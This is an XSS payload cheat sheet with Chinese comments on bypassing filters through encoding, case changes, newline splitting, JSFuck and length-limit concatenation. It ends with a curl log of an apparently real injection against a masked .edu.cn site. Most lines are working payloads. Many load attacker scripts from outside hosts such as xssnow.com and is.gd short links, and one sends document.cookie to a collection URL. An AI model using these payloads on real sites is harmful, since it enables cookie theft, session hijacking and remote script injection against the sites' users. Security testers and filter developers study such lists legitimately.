< script > alert ( 0 )</ script >
< script > confirm ( 1 )</ script >
< script > prompt ( 2 )</ script >
< script > \u 0061 \u 006C \u 0065 \u 0072 \u 0074 ( 3 )</ script >
< script >[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()</ script >
< script > $ =~[]; $ ={ ___ :++ $ , $$$$ :(![]+ "" )[ $ ], __$ :++ $ , $_$_ :(![]+ "" )[ $ ], _$_ :++ $ , $_$$ :({}+ "" )[ $ ], $$_$ :( $ [ $ ]+ "" )[ $ ], _$$ :++ $ , $$$_ :(! "" + "" )[ $ ], $__ :++ $ , $_$ :++ $ , $$__ :({}+ "" )[ $ ], $$_ :++ $ , $$$ :++ $ , $___ :++ $ , $__$ :++ $ }; $ . $_ =( $ . $_ = $ + "" )[ $ . $_$ ]+( $ . _$ = $ . $_ [ $ . __$ ])+( $ . $$ =( $ . $ + "" )[ $ . __$ ])+((! $ )+ "" )[ $ . _$$ ]+( $ . __ = $ . $_ [ $ . $$_ ])+( $ . $ =(! "" + "" )[ $ . __$ ])+( $ . _ =(! "" + "" )[ $ . _$_ ])+ $ . $_ [ $ . $_$ ]+ $ . __ + $ . _$ + $ . $ ; $ . $$ = $ . $ +(! "" + "" )[ $ . _$$ ]+ $ . __ + $ . _ + $ . $ + $ . $$ ; $ . $ =( $ . ___ )[ $ . $_ ][ $ . $_ ]; $ . $ ( $ . $ ( $ . $$ + "\"" + $ . $_$_ +(![]+ "" )[ $ . _$_ ]+ $ . $$$_ + "\\" + $ . __$ + $ . $$_ + $ . _$_ + $ . __ + "(" + $ . $_$ + ")" + "\"" )())();</ script >
< script >+ alert ( 6 )</ script >
< script test > alert ( 7 )</ script >
< script > alert (/ 8 /)</ script >
< script src = data : text / javascript , alert ( 9 )></ script >
< script src = data : text / javascript , alert ( 10 )></ script >
< script > alert ( String . fromCharCode ( 49 , 49 ))</ script >
< script > alert (/ 12 /. source )</ script >
< script > setTimeout ( alert ( 13 ), 0 )</ script >
< script > document [ 'write' ]( 14 );</ script >
< anytag onmouseover = alert ( 15 )> M
< anytag onclick = alert ( 16 )> M
< a onmouseover = alert ( 17 )> M
< a onclick = alert ( 18 )> M
< a href = javascript : alert ( 19 )> M
< button / onclick = alert ( 20 )> M
< form >< button formaction = javascript : alert ( 21 )> M
< form / action = javascript : alert ( 22 )>< input / type = submit >
< form onsubmit = alert ( 23 )>< button > M
< img src = x onerror = alert ( 24 )>
< img src = x onError = alert ( 24 )> 大写 bypass 某些过滤
< body / onload = alert ( 25 )>
< body onscroll = alert ( 26 )>< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< br >< input autofocus >
< iframe src = j
a
v
a
s
c
r
i
p
t
: a
l
e
r
t
% 28
27
% 29 ></ iframe >
< iframe src = "http://0x.lv/xss.swf" ></ iframe >
< iframe / onload = alert ( document . domain )></ iframe >
< IFRAME SRC = "javascript:alert(29);" ></ IFRAME >
< meta http - equiv = "refresh" content = "0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2F%73%63%72%69%70%74%3E" >
< object data = data : text / html ; base64 , PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ +></ object >
< object data = "javascript:alert(document.domain)" >
< marquee onstart = alert ( 30 )></ marquee >
< isindex type = image src = 1 onerror = alert ( 31 )>
< isindex action = javascript : alert ( 32 ) type = image >
< input onfocus = alert ( 33 ) autofocus >
< input onblur = alert ( 34 ) autofocus >< input autofocus >
< INPUT TYPE = "IMAGE" SRC = x onerror = alert ( 35 )>
< select onfocus = alert ( 36 ) autofocus >
< textarea onfocus = alert ( 37 ) autofocus ></ textarea >
< keygen onfocus = alert ( 38 ) autofocus >
< FRAMESET >< FRAME SRC = "javascript:alert(document.domain);" ></ FRAMESET >
< frameset onload = alert ( 40 )>
< embed src = "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+" ></ embed >
< embed src = javascript : alert ( document . domain )>
< math href = "javascript:alert(45)" > M
< math > < maction actiontype = "" xlink : href = "javascript:alert(46)" > M
< math xlink : href = javascript : alert ( 47 )> M
< img src = x onerror = "var s=document.createElement('script');s.src=" 这里填 js 地址 ";document.body.appendChild(s);" >
domain = javascript : location . href = alert ( document . cookie )//
< img src =# id = xssyou style = display : none onerror = eval ( unescape (/ var b = document . createElement ( "script" ); b . src = "http://xssnow.com/zuVV?" + Math . random ();( document . getElementsByTagName ( "HEAD" )[ 0 ]|| document . body ). appendChild ( b );/. source ));//>
< img src =# id = xssyou style = display : none onerror = eval ( unescape (/ var b = document . createElement ( "script" ); b . src = "http://www.woshimaisaike.com/oWaKwi" ;( document . getElementsByTagName ( "HEAD" )[ 0 ]|| document . body ). appendChild ( b );/. source ));//>
< img src =# id = xssyou style = display : none onerror = eval ( unescape (/ var % 20b % 3Ddocument . createElement % 28 % 22script % 22 % 29 % 3Bb . src % 3D % 22http % 3A % 2F % 2Fwww . woshimaisaike . com % 2FoWaKwi % 22 % 3B % 28document . getElementsByTagName % 28 % 22HEAD % 22 % 29 % 5B0 % 5D % 7C % 7Cdocument . body % 29.appendChild % 28b % 29 % 3B /. source ));//><//实际提交时需要使用这条,需要 url 编码>
伪协议: ed2k ://| file | test | '+alert(document.cookie)+' | test /
[ url =< a id = "ed2k_T7V" href = "ed2k://|file|test|'+alert(document.cookie)+'|test/" target = "_blank" > 1 </ a >] 2 [/ url ]
< svg / onload = document . body . appendChild ( createElement (/ script /. source )). src = String . fromCharCode ( 47 , 47 , 116 , 46 , 99 , 110 , 47 , 56 , 115 , 56 , 103 , 101 , 74 , 86 )
< svg xmlns = "url" >< g onload = "javascript:alert(1)" ></ g ></ svg >
如果只允许()[]!+ $ ,那么可以使用 JSFCUK , JSOTHER , jjencode 、 aaencode .
< script > eval ( 'document.write("<\163cript/src=http://is.gd/grcGnF></\163cript>")' );</ script >
< div style = "display:none" >< img title = "with(top.document)body.appendChild(createElement('script')).src='http://127.0.0.1/aol.php?mail=aol'" style = "" onerror=eval(this.title) src=x" ></ div >
< a href = "javasc
ript:jQuery.getScript('//xss.**/****')" >点击查看详情</ a >//<在< script >和 javascript 等字符串中间会加上< x >,即变成< scr < x > ipt >和 java < x > script ,但是这里把 javascript 中间插入换行符(即 table 或者回车键)就可以绕过了><用 jQuery . getScript 执行外部 js >//需要具体环境
< a href = "javasc
ript:alert(/xss/)" >点击查看详情</ a ><
要换成 tabale 或者回车><注意: firefox 不可以, chrome 可以>
< img width = 0 height = 0 onerror = " var NagvIw1 = window['document']['getElementsByTagName']('HEAD')['item'](0);var LVdmojAqt2 = window['document']['createElement']('script');LVdmojAqt2['type'] = 'text/javascript';LVdmojAqt2['src'] = '*****.js';NagvIw1['appendChild'](LVdmojAqt2);" src = "1" />
< img src = x onerror = document . body . appendChild ( createElement (/ script /. source )). src = alt alt =// km3 . pw >
< a href = javascript : alert ( document . cookie )>< img src = XXXX . png ></ a > < a >与< img >标签配合使用,会在< a >标签内插入一张图片,点击图片则触发< a >标签
< img src = x onerror = d = document ; e = d . createElement ( 'script' ); e . src = 'http://127.0.0.1/eXploit.js' ; d . body . appendChild ( e );>
< svg / onload = prompt ( 1 )>
未来所有的浏览器支持 ES6 ,所以可以使用下面两个 payload :< script > eval . call ` $ { 'prompt\x281)' }`</ script >,< script > eval . call ` $ { 'prompt\x281)' }`</ script >
< input value = "" onresize = "prompt(1)" type = "text" > // IE10 下有效 在 IE10 下,当页面第一次加载时,会调用 resize 事件
< p class = "comment" title = "" onload = 'prompt(1)'"></p>
<input value="" type=image src onerror=
" prompt ( 1 ) " type=" text ">
<img src=x onerror=x={png:1};(function(){alert(location.href)})(x //不能注释时使用闭合,构造后为:<img src=x onerror=x={png:1};(function(){alert(location.href)})(x).png>
<img src=x top.onerror=alert(1)/>
<img src=x onerror=top[" loc "+" ation "]='javascript:alert(1)'>
<img src=x onerror=self[" loc "+" ation "]='javascript:alert(1)'>
<img src=x onerror=parent[" loc "+" ation "]='javascript:alert(1)'>
<img src=" x " onerror=" $ [ '\147\145\164S\143\162\151\160\164' ]( '\150\164\164\160\72\57\57\170\163\163\56\162\145\57\66\70\71\66' ) "><通过jquery>
<img src=" x " onerror=" []. constructor . constructor ( 'aler\164(1)' )() ">
<video src=http://www.baidu.com/img/bd_logo1.png onprogress=document.body.appendChild(document.createElement(/script/.source)).src=id id=//qqq.si/CVuD63>
<img src=x onerror=eval('window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,46,114,101,47,55,48,52,50);document.body.appendChild(window.s)')>11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
<video src=http://www.baidu.com/img/baidu_jgylogo3.gif onprogress=$['get\123cript']('http://w.s.js')>
<img src=x
onerror
=alert(1)> 利用换行绕过
javAScripT:eval(atob(/ZG9jdW1lbnQud3JpdGUoJzxzY3JpcHQgc3JjPWh0dHA6Ly94NTUubWh6LnB3L0hZYkJ3VT48L3NjcmlwdD4nKTs/.source)) 用//.source代替引号
<!--[if true]><img onerror=alert(1) src=--><form
action=javascript:alert(2)><input type=submit><input
autofocus onfocus=alert(3)><select autofocus
onfocus=alert(4)><textarea autofocus onfocus=alert(5)><HTML5特性>
<span style=" background - color : expression ( alert ( 1 )); ">
On/focus/=/" / alert /(/ docu / ment /. cook / ie /) 用/分隔关键字绕过
< img width = "540" height = "258" style = "xxx:expressio/*\0*/n(if(!window.x){alert(document.domain);window.x=1;})" src = "http://www.baidu.com/img/bd_logo1.png" data_ue_src = "http://www.baidu.com/img/bd_logo1.png" >
t <!--->< form >< button + formaction % 3djavascript % 3aalert ( 1 )+ autofocus +/> te
t <!--->< form >< button formaction = javascript : alert ( 1 ) autofocus /> te
< img src = 3D # style=3D"display:none" onerror=3Dalert(0)> 3D绕过
< link rel = import href = http :// xxx / xxx . html > 36 版 chrome 最新支持
< vmlframe xmlns = "urn:schemas-microsoft-com:vml" style = "behavior:url(#default#vml);position:absolute;width:100%;height:100%" src = "http://itsokla.duapp.com/shouzi.vml#xss" ></ vmlframe >
< img src = x onerror = eval ( location . hash . slice ( 1 ))>
< video src = '//dwz.cn/zNNYd' onsuspend = alert ( 1 )>
< img / src = 'x' / onerror = alert ( 1 )//
<!--[ if true ]>< img onerror = alert ( 1 ) src =-->< form action = javascript : alert ( 2 )>< input type = submit >< input autofocus onfocus = alert ( 3 )>< select autofocus onfocus = alert ( 4 )>< textarea autofocus onfocus = alert ( 5 )>
< form id = "test" ></ form >< button form = "test" formaction = "javascript:alert(1)" > X </ button > < form id = "test" ></ form >< button form = "test" formaction = "javas
cript:alert(1)" > X </ button > html5 新增的实体命名编码:
换行实现绕过
< img onreadystatechange = "alert(/xss/)" src = x >
< img src = x onerror = alert (/ xss /)>
< iframe src = "javascript:confirm(2)" ></ iframe >
< iframe src = "javascript:alert(/xss/)" style = "display:none" ></ iframe >
< a xlink : href = javascript : alert ( document . cookie )>
< svg >< animateTransform attributeName = transform onbegin = alert ( 2 )>
< fremeser onload = alert ( 1 )/>
< marquee onstart = alert ( 2 )></ marquee >
< animateTransform attributeName = transform onbegin = alert ( 1 )>
< meta http - equiv = "refresh" content = "0; url=data:text/html,%3Cscript%3Ealert%281%29%3C%2fscript%3E" >
< meta http - equiv = "refresh" content = "0; url=data:text/html,%3Cscript%3Ewindow.open%28%27file%3A%2f%2fC%3A%2fwindows%2fsystem32%2fcmd.exe.%27%29%3C%2fscript%3E" >
< a href = "java
script:alert(document.cookie)" > xx </ a >
< a href = "java
script:alert(document.cookie)" > xx </ a >
? id =< svg / onload = $ . getScript ( '//website/xxx.js' )>
? id =< svg / onload = eval ( location . hash . substr ( 1 ))># YourJSCode
< svg / onload = location . href = "//yourdomain.com/record.php?" + escape ( document . cookie )></ svg >
< svg / onload = name = document . cookie . toString ()></ svg >
< svg / onload = postMessage ( document . body . innerHTML , '*' );></ svg >
< iframe src = "target.html?xsscode=<svg/onload=eval(name)></svg>" name = "document.write('xss payload')" />
< svg / onload = document . write ( "\x3cscript/src=http://abcd.com/xss.js\x3e\x3c/script\x3e" )></ svg >
< script / src =// 18.gy > // xss 短链接 20 字符
< img src = 6 onerror = s1 = 'scri' ; s2 = 'pt' ; s = createElement ( s1 + s2 ); body . appendChild ( s ); s . src = 'http://t.cn/RUsPCEK' ;//////;-------->
绕过关键字 script 以及对>进行编码
< svg >< use xlink : href = "data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0iNTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+#rectangle" /></ svg > 保存为 1.htm 作为附件发送给对方,然后对方预览
}</ style >< script > alert (/ xss /)</ 在 DOC 文档字体中插入
< svg >< animateTransform attributeName = transform dur = 1s onend = alert ( 1 )>
Concat 绕过长度限制:
< htmnl >
< head ></ head >
< body >
< a onmouseover = "a='http:'" > a9 </ a >
< a onmouseover = "s=String.fromCharCode" > a10 </ a >
< a onmouseover = "a=a.concat(s(47))" > a11 </ a >//用 String . fromCharCode 将 47 转换成字符/,然后用 concat 拼接到 a 上
< a onmouseover = "a=a.concat(s(47))" > a12 </ a >
< a onmouseover = "a=a.concat('is.gd')" > a13 </ a >
< a onmouseover = "a=a.concat(s(47))" > a14 </ a >
< a onmouseover = "a=a.concat('lFYAxW')" > a15 </ a >
< a onmouseover = "r='script'" > a2 </ a >
< a onmouseover = "d=document" > a3 </ a >
< a onmouseover = "n=d.createElement(r)" > a4 </ a >
< a onmouseover = "n.src=a" > a5 </ a >
< a onmouseover = "h=d.body" > a6 </ a >
< a onmouseover = "h.appendChild(n)" > a7 </ a >
</ body >
</ html >
+号拼接绕过长度限制
< htmnl >
< head ></ head >
< body >
< a onmouseover = "a='http:'" > a9 </ a >
< a onmouseover = "a=a+'//is.gd'" > a9 </ a >
< a onmouseover = "a=a+'/lFYAxW'" > a9 </ a >
< a onmouseover = "r='script'" > a2 </ a >
< a onmouseover = "d=document" > a3 </ a >
< a onmouseover = "n=d.createElement(r)" > a4 </ a >
< a onmouseover = "n.src=a" > a5 </ a >
< a onmouseover = "h=d.body" > a6 </ a >
< a onmouseover = "h.appendChild(n)" > a7 </ a >
</ body >
</ html >
FLASHxss
< embed src = "http://cm2.in/xss.swf" allownetworking = "all"
allowscriptaccess = "always" >
不常见的on事件,可能可以绕过过滤,
fscommand
onbegin
ondragdrop
onend
onhashchange
oninput
onmediacomplete
onmediaerror
onmessage
onoffline
onoutofsync
onpause
onpopstate
onprogress
onredo
onrepeat
onresume
onreverse
onrowsenter
onrowdelete
onrowinserted
onseek
onstorage
onsyncrestored
ontimeerror
ontrackchange
onundo
onurlflip
seeksegmenttime
$ curl - v "http://****.edu.cn/go.asp?url=javascript\u003aeval(location.hash.slice(1))#alert(document.cookie);"
* Trying 127.0 . 0.1 ...
* Connected to 127.0 . 0.1 ( 127.0 . 0.1 ) port 1080 (# 0 )
> GET http ://****. edu . cn / go . asp ? url = javascript\u 003aeval ( location . hash . slice ( 1 )) HTTP / 1.1
> User - Agent : curl / 7.41 . 0
> Host : ****. edu . cn
> Accept : */*
> Proxy - Connection : Keep - Alive
>
< HTTP / 1.1 200 OK
< Connection : close
< Date : Mon , 27 Jun 2016 06 : 13 : 31 GMT
< Server : Microsoft - IIS / 6.0
< X - Powered - By : ASP . NET
< Content - Length : 113
< Content - Type : text / html
< Set - Cookie : ASPSESSIONIDCCTTQQQQ = KLNDIOEAOHCIMEMFJMOOMCHN ; path =/
< Cache - control : private
< Proxy - Connection : keep - alive
<
< script language = "javascript" >
window . location . href = "javascript\u003aeval(location.hash.slice(1))" ;
</ script >* Closing connection 0
限制信息:url字符串长度不能超过100,而且会检查一些关键字,比如url=javascript:alert(1);会被拦截,但可以用JS编码绕过。